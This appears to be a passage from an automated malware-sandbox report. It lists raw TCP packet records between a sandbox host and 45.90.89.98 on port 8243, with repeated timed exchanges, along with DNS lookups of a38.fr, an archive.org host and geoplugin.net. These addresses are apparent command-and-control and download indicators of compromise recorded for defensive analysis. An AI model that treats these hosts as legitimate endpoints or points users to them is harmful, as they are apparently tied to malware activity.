                                                              Aug 28, 2024 14:01:04.565556049 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.565557003 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.565568924 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.565572977 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.565582037 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.565593004 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.565602064 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.565624952 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.567635059 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567646027 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567656040 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567682028 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.567781925 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567792892 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567801952 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567811966 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567817926 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.567847967 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.567850113 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567861080 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567871094 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567881107 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567883015 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.567890882 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.567909956 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.568233967 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.568243980 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.568272114 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.571465969 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571604967 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.571772099 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571783066 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571789026 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571796894 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571830988 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.571926117 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571935892 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.571968079 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.574295044 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642368078 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642379999 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642390013 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642400980 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642420053 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642431974 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642437935 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642471075 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642482042 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642498016 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642513037 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642524958 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642532110 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642534018 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642550945 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642558098 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642561913 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642571926 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642587900 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642591000 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642599106 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642608881 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642613888 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642623901 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642631054 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642633915 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642646074 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642657042 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.642664909 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642694950 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.642754078 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.699851990 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699867010 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699881077 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699903011 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699914932 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699918032 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.699934959 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699949026 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.699949026 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.699970961 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.699992895 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700004101 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700016022 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700026035 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700036049 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700037956 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700072050 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700108051 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700541019 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700551033 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700561047 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700588942 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700611115 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700620890 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700630903 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700640917 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700653076 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700658083 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700675964 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700754881 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700767040 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700777054 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700788021 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700798035 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700798988 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700809002 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700819969 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700836897 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700856924 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700859070 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700866938 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700875044 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700886011 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700897932 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.700900078 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.700923920 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.702512026 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703110933 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703219891 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703229904 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703239918 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703255892 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703265905 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703267097 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703278065 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703289986 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703299999 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703330994 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703361988 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703377962 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703387022 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703397989 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703408957 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703417063 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703421116 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703435898 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703459024 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703496933 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703507900 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703517914 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703530073 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703540087 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703552008 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703567028 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703572035 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703577995 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703588009 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703603983 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703617096 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703619003 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703628063 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703638077 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703649998 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703654051 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703668118 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703679085 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703689098 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703691006 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703712940 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703754902 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703764915 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703774929 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703797102 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703866959 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703915119 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703921080 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703931093 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703963041 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.703986883 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.703996897 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704006910 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704018116 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704029083 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704060078 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704077959 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704088926 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704098940 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704121113 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704179049 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704190016 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704199076 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704225063 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704236984 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704247952 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704257965 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704276085 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704310894 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704322100 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704332113 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704343081 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704344034 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704364061 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704543114 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704552889 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704561949 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704576969 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704581022 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704587936 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704601049 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704612970 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704615116 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704623938 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704636097 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704638958 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704646111 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:04.704649925 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704668999 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.704688072 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:04.713223934 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.148756027 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.264965057 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.264980078 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.265079021 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.269942045 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.269953012 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.269962072 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.269999981 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.269999981 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.270064116 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.270107031 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.274863958 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274873018 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274888039 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274897099 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274915934 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274916887 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.274924040 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274955034 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.274962902 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.275270939 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:10.279711962 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.279758930 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.279887915 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.280368090 CEST82434917845.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:10.280426979 CEST491788243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:24.215128899 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:24.215145111 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:24.215226889 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:24.215253115 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:24.215301037 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:24.217461109 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:24.223195076 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:53.681721926 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:53.683202028 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:01:53.688020945 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:01:56.027712107 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:01:56.361974955 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:01:56.970371962 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:01:58.171603918 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:02:00.587440968 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:02:05.431294918 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:02:15.034192085 CEST4917980192.168.2.22178.237.33.50
                                                              Aug 28, 2024 14:02:15.160232067 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:15.472044945 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:16.153820992 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:17.359683037 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:19.762099981 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:24.005609035 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:02:24.007496119 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:02:24.012830019 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:02:24.567490101 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:34.205975056 CEST4917380192.168.2.22137.184.234.91
                                                              Aug 28, 2024 14:02:54.273710012 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:02:54.278214931 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:02:54.283330917 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:03:24.561649084 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:03:24.592155933 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:03:24.600012064 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:03:54.834213018 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:03:54.839404106 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:03:54.847274065 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:04:25.158277988 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:04:25.160144091 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:04:25.165275097 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:04:55.317632914 CEST82434917745.90.89.98192.168.2.22
                                                              Aug 28, 2024 14:04:55.318986893 CEST491778243192.168.2.2245.90.89.98
                                                              Aug 28, 2024 14:04:55.335133076 CEST82434917745.90.89.98192.168.2.22
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 28, 2024 14:00:22.376549006 CEST5456253192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:22.495987892 CEST53545628.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:24.833873034 CEST5291753192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:24.841094017 CEST53529178.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:28.401300907 CEST6275153192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:28.439661980 CEST53627518.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:28.442305088 CEST5789353192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:28.479640007 CEST53578938.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:34.477263927 CEST5482153192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:34.516761065 CEST53548218.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:34.521842003 CEST5471953192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:34.528851032 CEST53547198.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:36.017930984 CEST4988153192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:36.055296898 CEST53498818.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:36.057689905 CEST5499853192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:36.064768076 CEST53549988.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:47.268582106 CEST5278153192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:47.278953075 CEST53527818.8.8.8192.168.2.22
                                                              Aug 28, 2024 14:00:53.612262011 CEST6392653192.168.2.228.8.8.8
                                                              Aug 28, 2024 14:00:53.621352911 CEST53639268.8.8.8192.168.2.22
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Aug 28, 2024 14:00:22.376549006 CEST192.168.2.228.8.8.80x47a4Standard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:24.833873034 CEST192.168.2.228.8.8.80xc5deStandard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:28.401300907 CEST192.168.2.228.8.8.80x5853Standard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:28.442305088 CEST192.168.2.228.8.8.80x4d82Standard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:34.477263927 CEST192.168.2.228.8.8.80x1100Standard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:34.521842003 CEST192.168.2.228.8.8.80x2664Standard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:36.017930984 CEST192.168.2.228.8.8.80xb6ecStandard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:36.057689905 CEST192.168.2.228.8.8.80xd97eStandard query (0)a38.frA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:47.268582106 CEST192.168.2.228.8.8.80xcdc2Standard query (0)ia803104.us.archive.orgA (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:53.612262011 CEST192.168.2.228.8.8.80x6db2Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Aug 28, 2024 14:00:22.495987892 CEST8.8.8.8192.168.2.220x47a4No error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:24.841094017 CEST8.8.8.8192.168.2.220xc5deNo error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:28.439661980 CEST8.8.8.8192.168.2.220x5853No error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:28.479640007 CEST8.8.8.8192.168.2.220x4d82No error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:34.516761065 CEST8.8.8.8192.168.2.220x1100No error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:34.528851032 CEST8.8.8.8192.168.2.220x2664No error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:36.055296898 CEST8.8.8.8192.168.2.220xb6ecNo error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:36.064768076 CEST8.8.8.8192.168.2.220xd97eNo error (0)a38.fr45.83.105.92A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:47.278953075 CEST8.8.8.8192.168.2.220xcdc2No error (0)ia803104.us.archive.org207.241.232.154A (IP address)IN (0x0001)false
                                                              Aug 28, 2024 14:00:53.621352911 CEST8.8.8.8192.168.2.220x6db2No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                              • a38.fr
                                                              • ia803104.us.archive.org
